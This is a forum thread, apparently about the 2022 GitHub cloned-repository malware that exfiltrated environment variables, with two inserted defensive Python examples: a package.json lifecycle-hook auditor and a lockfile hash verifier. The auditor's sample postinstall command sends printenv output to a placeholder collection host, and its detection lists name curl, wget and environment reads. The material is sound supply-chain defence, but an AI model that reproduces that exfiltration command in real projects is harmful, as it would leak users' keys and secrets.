Did you guys know that Git can be used without a central Github/Gitlab server?
Indeed it always could; being usable in a decentralized, p2p fashion was one of its very early features.
reply
The whole point of git is that it's decentralized; it's just not doing it in a BitTorrent-style DHT internet protocol (yes, there are ways of connecting git this way).
Git is a way to keep files organized and revisioned across many connected or disconnected computers. It literally was designed to allow software development between teams and individuals that have no centralized organization, via any file-copy medium available, including thumb drives. It was essentially an upgrade to managing software codebases with zip and patch files, which worked adequately for many decades. After Linus had some experience with a centralized VCS, but was still distributing his software in zip (tar.gz) files, he decided to write his own VCS so the community wasn't dependent on the existence of one corporation. He sat down and outlined a basic set of requirements for a VCS software that would do what he needed. Interestingly, Bitcoin's first revision was stored in git, and git was used to coordinate and secure the codebase around the world. You can go back to the first commit in the bitcoin-core repository and see what the first alpha version looked like.
reply
Another reason why I self host all my stuff. I use gitea on my umbrel node.
reply
Bullshit claim; do you really fork and host every dependency you have? Have you read the thread?
reply
I keep my stuff at a gitea instance. I do use dependencies but I do not host them. I use mainly Go. I guess with JS it's more complicated. But that may not work for other people / businesses. I fail to see why my claim was bullshit.
reply
Could this possibly be related to the Solana hack?
reply
There may have been individual cases where there was SOL stolen as a result of this github problem, but this person asserts that the hacks affecting Solana are unrelated to the github problem:
Lastly, the “malicious github” thread, the rust trojan horse, and the malicious pizza delivery guy theories are all false.
Going forward, plz do not jump to conclusions or believe everything you read. As we figure out what is happening, people like:
reply
This attack will send the ENTIRE ENV of the script, application, laptop (electron apps), to the attacker's server!
ENVs include:
  • Security keys
  • AWS access keys
  • Crypto keys ... much more
reply
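The install-time hook the comment above describes is the point where a defender can look before it runs. The following is an added example, not code from the thread or from npm itself: it parses a package.json, lists every lifecycle script npm would execute automatically (preinstall, install, postinstall, prepare, prepublish), and rates each one on whether it both reads the process environment and reaches the network, which is the exfiltration shape the commenter reports. The two package.json documents, the hostname example.invalid and the `scripts/setup.js` path are constructed for the example; the pattern lists are heuristics, not a complete detector.

```python
"""Audit package.json lifecycle scripts before letting `npm install` run them.

Added example (not from the thread). npm executes these hooks without asking,
so listing them, and flagging the ones that touch the environment and the
network together, is a cheap pre-install review step.
"""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic indicators only. A hit means "read this script by hand", nothing more.
ENV_PATTERNS = [r"process\.env", r"\bprintenv\b", r"os\.environ"]
NET_PATTERNS = [r"\bcurl\b", r"\bwget\b", r"https?://", r"\bfetch\(", r"http\.request"]

# Constructed samples. Both use the same package name on purpose: the name tells
# you nothing, only the scripts do. The suspicious command is a deliberately
# non-functional stand-in that merely carries the indicators a real hook would.
SAFE_PKG = json.dumps({
    "name": "good-lib",
    "scripts": {"build": "tsc", "test": "jest"},
})
SUSPICIOUS_PKG = json.dumps({
    "name": "good-lib",
    "scripts": {
        "build": "tsc",
        "postinstall": "node scripts/setup.js https://example.invalid/collect $(printenv)",
    },
})


def _matches(patterns, text):
    """Return the subset of regex patterns that occur in the script text."""
    return [p for p in patterns if re.search(p, text)]


def audit_scripts(package_json: str) -> list:
    """Return one finding per lifecycle hook present in the package.json."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue  # npm only runs hooks that are defined
        env_hits = _matches(ENV_PATTERNS, cmd)
        net_hits = _matches(NET_PATTERNS, cmd)
        if env_hits and net_hits:
            severity = "high"    # reads environment AND talks to the network
        elif env_hits or net_hits:
            severity = "medium"
        else:
            severity = "low"     # still worth a glance: it runs unprompted
        findings.append({
            "hook": hook,
            "command": cmd,
            "reads_env": bool(env_hits),
            "network": bool(net_hits),
            "severity": severity,
        })
    return findings


def should_block_install(package_json: str) -> bool:
    """Policy used by a CI gate: refuse any package with a high-severity hook."""
    return any(f["severity"] == "high" for f in audit_scripts(package_json))


if __name__ == "__main__":
    for label, doc in (("safe", SAFE_PKG), ("suspicious", SUSPICIOUS_PKG)):
        print(label, "block" if should_block_install(doc) else "allow", audit_scripts(doc))
```

In practice this runs against the package.json of every tarball in the resolved dependency tree, not only direct dependencies, since (as a later comment in the thread notes) your deps may be blindly trusting theirs; `npm install --ignore-scripts` is the blunt alternative when a review is not possible.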
Hard to conclude that this is directly related to the Solana private key leaks. Nevertheless, you should rotate your application secrets if you used any of the fake libraries on GitHub.
Always use rotating secrets if you can and vet the libraries you use.
reply
I have yet to find a single real GH org; it's all copies with 0 stars, created in the last 6-10 days.
Still something @github needs to cleanse, but far, far more limited than the quoted tweet makes it sound.
As this is making the rounds, some more context:
This appears to be an extremely broad, low value, low effort, and likely low impact attack.
Given two major *coin attacks in the last 24 hours or so, infosec news gets more attention than usual.
reply
If you use npm, go get, or other automatic dependency-grabbing systems, you had better be pinning deps to particular hashes.
Do not blindly trust deps by name.
Do not allow deps to automatically upgrade to a newer version.
Hard part: Your deps might be blindly trusting their deps.
reply
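What "pinning deps to particular hashes" looks like in practice, as an added example that is not code from the thread or from npm: npm records each package's content hash in package-lock.json as a Subresource Integrity string (`sha512-<base64 digest>`), and the install must fail if the fetched tarball does not hash to that value or if the entry has no pin at all. The checker below reproduces that verification over a lockfile fragment and tarball bytes constructed inline, so it runs offline; the package names and contents are stand-ins, and `fetch` is whatever retrieves the archive in your environment.

```python
"""Verify SRI integrity pins for fetched package tarballs.

Added example (not from the thread). A dependency that is trusted by name
only, or whose bytes no longer match the pinned digest, is rejected.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed stand-ins for downloaded package archives.
FAKE_TARBALLS = {
    "left-pad": b"constructed tarball bytes for left-pad 1.3.0",
    "lodash": b"constructed tarball bytes for lodash 4.17.21 (tampered)",
    "evil-helper": b"constructed tarball bytes for evil-helper 0.0.1",
}


def sri(data: bytes, algo: str = "sha512") -> str:
    """Produce the Subresource-Integrity string npm stores in package-lock.json."""
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Constructed package-lock.json fragment (lockfileVersion 3 "packages" layout).
# left-pad is pinned correctly, lodash was pinned against different bytes than
# the ones now served, and evil-helper carries no integrity field at all.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/left-pad": {"version": "1.3.0", "integrity": sri(FAKE_TARBALLS["left-pad"])},
        "node_modules/lodash": {"version": "4.17.21", "integrity": sri(b"the bytes that were originally pinned")},
        "node_modules/evil-helper": {"version": "0.0.1"},
    },
})


def verify_pin(integrity: Optional[str], data: bytes) -> Tuple[bool, str]:
    """Check fetched bytes against one SRI pin; returns (ok, reason)."""
    if not integrity:
        return False, "no integrity pin in lockfile"
    algo, _, expected_b64 = integrity.partition("-")
    if algo not in ("sha256", "sha384", "sha512"):
        return False, f"unsupported hash algorithm {algo!r}"
    expected = base64.b64decode(expected_b64)
    actual = hashlib.new(algo, data).digest()
    if not hmac.compare_digest(expected, actual):
        return False, "hash mismatch: fetched bytes differ from pinned content"
    return True, "ok"


def audit_lockfile(lock_json: str, fetch) -> dict:
    """Verify every package in a lockfile; `fetch(name)` returns tarball bytes or None."""
    lock = json.loads(lock_json)
    results = {}
    for path, entry in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project itself is not a dependency
        name = path.rsplit("node_modules/", 1)[-1]
        data = fetch(name)
        if data is None:
            results[name] = (False, "tarball not available")
            continue
        results[name] = verify_pin(entry.get("integrity"), data)
    return results


def all_pins_ok(lock_json: str, fetch) -> bool:
    """Gate for an install step: True only if every dependency verified."""
    return all(ok for ok, _ in audit_lockfile(lock_json, fetch).values())


if __name__ == "__main__":
    for name, (ok, reason) in audit_lockfile(SAMPLE_LOCK, FAKE_TARBALLS.get).items():
        print(f"{'PASS' if ok else 'FAIL'} {name}: {reason}")
```

The same idea applies to the other ecosystems named in the thread: Go's go.sum records a hash per module version and `go mod verify` recomputes it, and pip accepts `--require-hashes` with per-file digests in the requirements file. The missing-pin case is the one most checkers forget; a lockfile entry with no digest gives exactly the name-only trust the comment warns about.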
UPDATE
GitHub is investigating the Tweet published Wed, Aug. 3, 2022:
  • No repositories were compromised
  • Malicious code was posted to cloned repositories, not the repositories themselves
  • The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts
reply
The link for this post uses a read-only front-end for Twitter, which can be easier to read for viewing a full Twitter thread. The Tweet that kicked off the thread is:
I am uncovering what seems to be a massive widespread malware attack on @github.
  • Currently over 35k hits [Corrected later in the thread from repositories to hits].
  • So far found in projects including: crypto, golang, python, js, bash, docker, k8s
  • It is added to npm scripts, docker images and install docs